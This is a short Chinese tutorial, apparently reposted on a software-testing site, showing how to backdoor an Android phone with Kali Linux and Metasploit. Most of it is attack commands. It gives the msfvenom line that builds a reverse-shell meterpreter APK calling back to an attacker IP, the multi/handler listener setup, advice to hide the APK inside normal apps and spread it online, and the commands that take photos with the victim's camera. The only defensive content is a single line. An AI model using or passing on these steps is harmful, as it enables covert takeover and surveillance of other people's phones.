演示使用Metasploit入侵Android

发表于:2021-6-11 09:46

字体: | 上一篇 | 下一篇 | 我要投稿

 作者:罗道义    来源:博客园

  文本演示怎么使用Kali Linux入侵Android手机
  Kali Linux IP地址:192.168.0.112;接收连接的端口:443。
   
  同一局域网内android手机一部(android 5.1)
  创建一个后门程序
  在终端中执行:
  # msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.112 LPORT=443 > my_backdoor.apk
  这个后门程序(APK)是发送给受害者的;要把上面命令的IP地址替换为攻击者IP,当后门程序运行时,它会试图连接这个IP。
  启动Metasploit-等待受害者启动后门程序
  msfconsole
   
  依次执行:
  msf > use exploit/multi/handler
  > set payload android/meterpreter/reverse_tcp
  > set lhost 192.168.0.112
  > set lport 443
  > exploit
   
  分发后门程序
  一般后门程序都打包到正常app中,反正就是各种藏;
  借助internet分发后门程序。
  闲话不多书,这里我在自己的android手机上安装运行带后门的apk。
    
  病毒!!!
  控制受害者手机
  受害者运行后门程序之后,就可以使用Metasploit控制他了:
    
  使用help查看可以使用的命令:
   
  例如使用对方的摄像头拍照:
  > webcam_list
  > webcam_snap
  怎么防范:
  不要安装不信任的apk
    

上文内容不用于商业目的,如涉及知识产权问题,请权利人联系博为峰小编(021-64471599-8017),我们将立即处理。
《2023软件测试行业现状调查报告》独家发布~

关注51Testing

联系我们

快捷面板 站点地图 联系我们 广告服务 关于我们 站长统计 发展历程

法律顾问:上海兰迪律师事务所 项棋律师
版权所有 上海博为峰软件技术股份有限公司 Copyright©51testing.com 2003-2024
投诉及意见反馈:webmaster@51testing.com; 业务联系:service@51testing.com 021-64471599-8017

沪ICP备05003035号

沪公网安备 31010102002173号